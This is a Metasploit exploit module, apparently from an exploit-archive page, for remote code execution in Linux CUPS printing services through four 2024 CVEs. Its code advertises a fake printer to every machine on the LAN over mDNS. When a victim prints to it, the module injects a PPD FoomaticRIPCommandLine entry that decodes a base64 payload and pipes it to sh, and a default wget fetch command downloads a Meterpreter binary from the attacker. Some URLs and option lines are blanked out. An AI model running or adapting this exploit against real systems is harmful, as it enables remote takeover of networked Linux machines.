CUPS IPP Attributes LAN Remote Code Execution

Risk: High
Local: No
Remote: Yes

class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Exploit::Remote::DNS::Common include Exploit::Remote::SocketServer include Msf::Exploit::Remote::HttpServer::HTML # Accessor for IPP HTTP service attr_accessor :service2 MULTICAST_ADDR = '' # Define IPP constants module TagEnum UNSUPPORTED_VALUE = 0x10 UNKNOWN_VALUE = 0x12 NO_VALUE = 0x13 # Integer types INTEGER = 0x21 BOOLEAN = 0x22 ENUM = 0x23 # String types OCTET_STR = 0x30 DATETIME_STR = 0x31 RESOLUTION = 0x32 RANGE_OF_INTEGER = 0x33 TEXT_WITH_LANGUAGE = 0x35 NAME_WITH_LANGUAGE = 0x36 TEXT_WITHOUT_LANGUAGE = 0x41 NAME_WITHOUT_LANGUAGE = 0x42 KEYWORD = 0x44 URI = 0x45 URI_SCHEME = 0x46 CHARSET = 0x47 NATURAL_LANGUAGE = 0x48 MIME_MEDIA_TYPE = 0x49 end # Define IPP printer operations module OperationEnum # PRINT_JOB = 0x0002 VALIDATE_JOB = 0x0004 CANCEL_JOB = 0x0008 GET_JOB_ATTRIBUTES = 0x0009 GET_JOBS = 0x000a GET_PRINTER_ATTRIBUTES = 0x000b # 0x4000 - 0xFFFF is for extensions # CUPS extensions listed here: # CUPS_GET_DEFAULT = 0x4001 CUPS_LIST_ALL_PRINTERS = 0x4002 end module JobStateEnum # PENDING = 3 # AKA "IDLE" PENDING_HELD = 4 PROCESSING = 5 PROCESSING_STOPPED = 6 CANCELED = 7 ABORTED = 8 COMPLETED = 9 end # Define IPP section constants module SectionEnum SECTIONS = 0x00 SECTIONS_MASK = 0xf0 OPERATION = 0x01 JOB = 0x02 ENDTAG = 0x03 # Changed from END PRINTER = 0x04 UNSUPPORTED = 0x05 end class MulticastComm < Rex::Socket::Comm::Local # hax by spencer to set the socket options for handling multicast using the native APIs (as opposed to Rex::Socket) # without this in place, the module won't work on a system with multiple network interfaces def self.create_by_type(param, type, proto = 0) socket = super socket.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1) socket.setsockopt(::Socket::IPPROTO_IP, ::Socket::IP_MULTICAST_TTL, 255) membership = +'').hton socket.setsockopt(::Socket::IPPROTO_IP, ::Socket::IP_ADD_MEMBERSHIP, membership) socket end end def initialize(info = {}) super( update_info( info, 'Name' => 'CUPS IPP Attributes LAN Remote Code Execution', 'Description' => %q{ This module exploits vulnerabilities in OpenPrinting CUPS, which is running by default on most Linux distributions. The vulnerabilities allow an attacker on the LAN to advertise a malicious printer that triggers remote code execution when a victim sends a print job to the malicious printer. Successful exploitation requires user interaction, but no CUPS services need to be reachable via accessible ports. Code execution occurs in the context of the lp user. Affected versions are cups-browsed <= 2.0.1, libcupsfilters <= 2.1b1, libppd <= 2.1b1, and cups-filters <= 2.0.1. }, 'Author' => [ # Original researcher 'Simone Margaritelli', # Public exploit 'Rick de Jager', # IPP server implementation based on Python's ipp-server 'David Batley', # mDNS functionality 'Spencer McIntyre', 'RageLtMan <rageltman[at]sempervictus>', # Metasploit module 'Ryan Emmons' ], 'License' => MSF_LICENSE, 'References' => [ # The relevant CUPS CVE identifiers ['CVE', '2024-47076'], ['CVE', '2024-47175'], ['CVE', '2024-47177'], ['CVE', '2024-47176'], # The initial researcher publication ['URL', ''], # The public exploit this module was inspired by ['URL', ''], # The cups-browsed GitHub security advisory ['URL', ''], # The libcupsfilters GitHub security advisory ['URL', ''], # The libppd GitHub security advisory ['URL', ''], # The cups-filters GitHub security advisory ['URL', ''], # The IPP server implementation this module is based on ['URL', ''] ], # Executes as 'lp' on most Linux distributions 'Privileged' => false, 'Targets' => [['Default', {}]], 'Platform' => %w[linux unix], 'Arch' => [ARCH_CMD], 'DefaultOptions' => { 'FETCH_COMMAND' => 'WGET', 'FETCH_WRITABLE_DIR' => '/var/tmp' }, 'Stance' => Msf::Exploit::Stance::Passive, 'DefaultAction' => 'Service', 'DefaultTarget' => 0, 'DisclosureDate' => '2024-09-26', 'Notes' => { # There's a small chance the fake printer may flag as "broken" after one execution # If this happens, other victims on the LAN will still be susceptible to code execution # However, this *shouldn't* happen :) 'Stability' => [CRASH_SAFE], # Requires a user to send a print job to the malicious printer to trigger RCE 'Reliability' => [EVENT_DEPENDENT], 'SideEffects' => [ # /var/log/cups/error_log will likely contain the payload, IPP server details, and printer name # /var/log/cups/access_log will contain the IPP server details and printer name IOC_IN_LOGS, # The /tmp directory will likely contain a file called "foomatic-" + five random characters # This file is a PDF owned by 'lp', and it's the content that the victim user tried to print ARTIFACTS_ON_DISK ] } ) ) register_options( ['PrinterName', [true, 'The printer name', 'PrintToPDF'], regex: /^[a-zA-Z0-9_ ]+$/),'SRVHOST', [true, 'The local host to listen on (cannot be']),'SRVPORT', [true, 'The local port for the IPP service', 7575]) ] ) end def validate super if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0 raise{ 'SRVHOST' => 'The SRVHOST option must be set to a routable IP address.' }) end # Rex::Socket does not support forwarding UDP multicast sockets right now so raise an exception if that's configured unless _determine_server_comm(datastore['SRVHOST']) == Rex::Socket::Comm::Local raise{ 'SRVHOST' => 'SRVHOST can not be forwarded via a session.' }) end end # # Wrapper for service execution and cleanup # def exploit @printer_uuid = SecureRandom.uuid start_mdns_service start_ipp_service print_status("Services started. Printer '#{datastore['PrinterName']}' is being advertised") service.wait rescue Rex::BindFailed => e print_error "Failed to bind to port: #{e.message}" end # mDNS code below def start_mdns_service self.service = Rex::ServiceManager.start( Rex::Proto::MDNS::Server, '', 5353, false, nil, MulticastComm, { 'Msf' => framework, 'MsfExploit' => self } ) service.dispatch_request_proc = proc do |cli, data| on_dispatch_mdns_request(cli, data) end service.send_response_proc = proc do |cli, data| on_send_mdns_response(cli, data) end rescue ::Errno::EACCES => e raise Rex::BindFailed, e.message end def create_ipp_response(version_major, version_minor, request_id) # Printer attributes attributes = {} # Creating an MVP ("Minimum Viable Printer") # charset attributes[[SectionEnum::PRINTER, 'attributes-configured', TagEnum::CHARSET]] = ['utf-8'] # charset attributes[[SectionEnum::PRINTER, 'attributes-supported', TagEnum::CHARSET]] = ['utf-8'] # keyword attributes[[SectionEnum::PRINTER, 'compression-supported', TagEnum::KEYWORD]] = ['none'] # mimeMediaType attributes[[SectionEnum::PRINTER, 'document-format-default', TagEnum::MIME_MEDIA_TYPE]] = ['application/pdf'] # mimeMediaType attributes[[SectionEnum::PRINTER, 'document-format-supported', TagEnum::MIME_MEDIA_TYPE]] = ['application/pdf'] # naturalLanguage attributes[[SectionEnum::PRINTER, 'generated-natural-language-supported', TagEnum::NATURAL_LANGUAGE]] = ['en'] # keyword attributes[[SectionEnum::PRINTER, 'ipp-versions-supported', TagEnum::KEYWORD]] = ['1.1'] # keyword attributes[[SectionEnum::PRINTER, 'media-default', TagEnum::KEYWORD]] = ['iso_a4_210x297mm'] # keyword attributes[[SectionEnum::PRINTER, 'media-supported', TagEnum::KEYWORD]] = ['iso_a4_210x297mm'] # keyword attributes[[SectionEnum::PRINTER, 'media-type', TagEnum::KEYWORD]] = ['stationery'] enc_payload = Rex::Text.encode_base64(payload.encoded) # 1setOf keyword attributes[[SectionEnum::PRINTER, 'media-type-supported', TagEnum::KEYWORD]] = [ 'stationery', # Here's our base64-encoded fetch payload, which will grab a Meterpreter binary from our stager HTTP server ": HAX\n*FoomaticRIPCommandLine: echo -n #{enc_payload}|base64 -d|sh;#\n*cupsFilter2: \"application/vnd.cups-pdf application/pdf 0 foomatic-rip\"\n*%" ] # naturalLanguage attributes[[SectionEnum::PRINTER, 'natural-language-configured', TagEnum::NATURAL_LANGUAGE]] = ['en'] # 1setOf enum attributes[[SectionEnum::PRINTER, 'document-format-supported', TagEnum::ENUM]] = [ OperationEnum::PRINT_JOB, OperationEnum::VALIDATE_JOB, OperationEnum::CANCEL_JOB, OperationEnum::GET_JOB_ATTRIBUTES, OperationEnum::GET_PRINTER_ATTRIBUTES ] # keyword attributes[[SectionEnum::PRINTER, 'pdl-override-supported', TagEnum::KEYWORD]] = ['not-attempted'] # textWithoutLanguage attributes[[SectionEnum::PRINTER, 'printer-info', TagEnum::TEXT_WITHOUT_LANGUAGE]] = ['Printer'] # textWithoutLanguage attributes[[SectionEnum::PRINTER, 'printer-make-and-model', TagEnum::TEXT_WITHOUT_LANGUAGE]] = ['Printer 1.00'] # nameWithoutLanguage attributes[[SectionEnum::PRINTER, 'printer-name', TagEnum::NAME_WITHOUT_LANGUAGE]] = ['Printer'] # enum attributes[[SectionEnum::PRINTER, 'printer-state', TagEnum::ENUM]] = [JobStateEnum::PENDING] # AKA IDLE # keyword attributes[[SectionEnum::PRINTER, 'printer-state-reasons', TagEnum::KEYWORD]] = ['none'] # integer attributes[[SectionEnum::PRINTER, 'pdl-override-supported', TagEnum::INTEGER]] = [] # uri attributes[[SectionEnum::PRINTER, 'printer-uri-supported', TagEnum::URI]] = ['ipp://localhost:631/printer'] # keyword attributes[[SectionEnum::PRINTER, 'uri-authentication-supported', TagEnum::KEYWORD]] = ['none'] # keyword attributes[[SectionEnum::PRINTER, 'uri-security-supported', TagEnum::KEYWORD]] = ['none'] # Create response, imitating ipp-server's 'to_file' function # Pack the version response = [version_major, version_minor].pack('C*') # Pack the 2-byte status code response << [0x0000].pack('n') # Pack the 4-byte request ID response << [request_id].pack('N') # Group the above defined attributes by section (we use the PRINTER section for the payload) attributes.group_by { |k, _v| k[0] }.each do |section, attrs_in_section| response << [section].pack('C') attrs_in_section.each do |key, values| _section, name, tag = key values.each_with_index do |value, i| response << [tag].pack('C') if i == 0 response << [name.length].pack('n') response << name else response << [0].pack('n') end # Make sure non-string values work by packing as four bytes (should work for all ints) if value.is_a?(Integer) response << [4].pack('n') response << [value].pack('N') else # Packing strings response << [value.length].pack('n') response << value end end end end # Close out attributes with an ENDTAG response << [SectionEnum::ENDTAG].pack('C') response end # # IPP servers communicate using a binary protocol via HTTP # def start_ipp_service # Start the IPP web service self.service2 = Rex::ServiceManager.start( Rex::Proto::Http::Server, srvport, srvhost, false, { 'Msf' => framework, 'MsfExploit' => self }, Rex::Socket::Comm::Local ) # Register a route for queries to the printer service2.add_resource('/ipp/print', 'Proc' => proc do |cli, req| case req.method # Some printers perform an initial GET request before the exploitable POST request # We serve up agreeable placeholder data for that initial request when 'GET' # Send HTTP response data ppd_content = ppd_out send_response(cli, ppd_content, 'Content-Type' => 'application/postscript') # When the victim system interacts with our printer, a POST request will be received when 'POST' # When VERBOSE is true, all request bytes will be printed vprint_status("Received IPP request: #{ do |b| format('%02x', b) end.join(' ')}") data = req.body.bytes return if data.length < 8 # Extract version, operation, and request ID from the request to print in VERBOSE mode version_major = data[0] version_minor = data[1] operation_id = (data[2] << 8) | data[3] request_id = (data[4] << 24) | (data[5] << 16) | (data[6] << 8) | data[7] vprint_status("IPP Version: #{version_major}.#{version_minor}, Operation: 0x#{operation_id.to_s(16)}, Request ID: #{request_id}") # Respond to the IPP request to confirm the printer is a valid target and inject the malicious payload response = create_ipp_response(version_major, version_minor, request_id) send_response(cli, response, 'Content-Type' => 'application/ipp', 'Content-Length' => response.length.to_s) end rescue StandardError => e vprint_error('An error occurred while processing an IPP request') vprint_error("IPP Error is #{e.class} - #{e.message}") vprint_error(e.backtrace.join("\n").to_s) raise e end, 'Path' => '/ipp/print') print_status("IPP service started on #{Rex::Socket.to_authority(srvhost, srvport)}") rescue Rex::BindFailed => e vprint_error("Failed to bind IPP web service to #{Rex::Socket.to_authority(srvhost, srvport)}") raise e end # # Printer info for victim systems that require an initial GET request. # def ppd_out <<~PPD *PPD-Adobe: "4.3" *FormatVersion: "4.3" *FileVersion: "1.0" *LanguageVersion: English *LanguageEncoding: ISOLatin1 *PCFileName: "#{datastore['PrinterName']}.PPD" *Manufacturer: "#{datastore['PrinterName']}" *Product: "(#{datastore['PrinterName']})" *ModelName: "#{datastore['PrinterName']}" *ShortNickName: "#{datastore['PrinterName']}" *NickName: "#{datastore['PrinterName']}" *PSVersion: "(3010.000) 0" *LanguageLevel: "3" *ColorDevice: True *DefaultColorSpace: RGB *FileSystem: False *Throughput: "1" *LandscapeOrientation: Plus90 *TTRasterizer: Type42 *cupsVersion: 1.4 *cupsModelNumber: 1 *cupsManualCopies: True *cupsFilter: "application/vnd.cups-postscript 0 -" *cupsFilter: "application/vnd.cups-pdf 0 -" *OpenUI *PageSize/Media Size: PickOne *DefaultPageSize: Letter *PageSize Letter: "<</PageSize[612 792]/ImagingBBox null>>setpagedevice" *CloseUI: *PageSize *DefaultImageableArea: Letter *ImageableArea Letter: "0 0 612 792" *DefaultPaperDimension: Letter *PaperDimension Letter: "612 792" PPD end # # Creates Proc to handle incoming requests # def on_dispatch_mdns_request(cli, data) # Handle empty mDNS data return if data.strip.empty? # Encode the incoming packet as a Dnsruby message req = Packet.encode_drb(data) # Ignore responses return if req.header.qr # Print the incoming request in VERBOSE mode (will produce a lot of output) peer = Rex::Socket.to_authority(cli.peerhost, cli.peerport) asked =', ') vprint_status("Received request for #{asked} from #{peer}") # Assign printer name variables for mDNS responses printer_name = datastore['PrinterName'] printer_name_no_space = printer_name.gsub(/ /, '') ipp_printer_name = "#{printer_name_no_space}._ipp._tcp.local" # A draft approach was to advertise our malicious printer by selectively responding only to _ipp and _printer queries # However, that requires the victim to search for new printers, which doesn't happen on most systems during a print dialog (it requires Settings->Printers->"Add Printer" on Ubuntu) # Also, different distributions seem to have different flows for that, which made the approach unreliable # So, instead of that, we just spray responses to every single mDNS query within the multicast domain to automatically populate the victim's printer list with our malicious printer return unless req.question.first # PTR record req.add_answer(Dnsruby::RR.create( name: '_ipp._tcp.local.', type: 'PTR', # Keeping TTL low because ghost records from previous module runs will hang the Linux printer selection window for ~30 seconds, impeding exploitation # Since we're spraying advertisements in response to everything, low TTL shouldn't be an issue ttl: 30, domainname: "#{ipp_printer_name}." )) # A record for our printer # All of these answers seem to need to be additional record answers, not just answers req.add_additional(Dnsruby::RR.create( name: "#{printer_name_no_space}.local.", type: 'A', ttl: 30, # The IP address of our malicious HTTP IPP service address: datastore['SRVHOST'] )) # SRV record req.add_additional(Dnsruby::RR.create( name: "#{ipp_printer_name}.", type: 'SRV', ttl: 30, priority: 0, weight: 0, # The port of our malicious HTTP IPP service port: datastore['SRVPORT'], target: "#{printer_name_no_space}.local." )) # TXT record req.add_additional(Dnsruby::RR.create( name: "#{ipp_printer_name}.", type: 'TXT', ttl: 30 ).tap do |rr| rr.strings = [ 'txtvers=1', 'qtotal=1', 'rp=ipp/print', "ty=#{printer_name}", 'pdl=application/postscript,application/pdf', # The "adminurl" value may or may not be queried, depending on the victim type # Points to our malicious HTTP IPP service "adminurl=http://#{Rex::Socket.to_authority(srvhost, srvport)}", 'priority=0', 'color=T', 'duplex=T', # Unique UUID to avoid printer collision from multiple runs with the same configuration "UUID=#{@printer_uuid}" ] end) # NSEC record, seems to be required, should be additional answer type req.add_additional(Dnsruby::RR.create( name: "#{ipp_printer_name}.", type: 'NSEC', ttl: 30, next_domain: "#{ipp_printer_name}.", types: 'AAAA' )) # Indicate our mDNS message is a query response req.header.qr = 1 # In response messages for Multicast domains, the Authoritative Answer bit MUST be set to one # req.header.aa = 1 # Clear questions and update counts for our response req.question.clear req.update_counts # Encode and send response response_data = Packet.generate_response(req).encode service.send_response(cli, response_data) end # # Creates Proc to handle outbound responses # def on_send_mdns_response(cli, data) # Log to console in VERBOSE mode, then write response vprint_status("Sending response to #{Rex::Socket.to_authority(cli.peerhost, cli.peerport)}") cli.write(data) end def cleanup super if service2 # Remove the IPP resource before stopping the HTTP service service2.remove_resource('/ipp/print') service2.stop self.service2 = nil end return unless service # Stop the mDNS service service.stop self.service = nil end end

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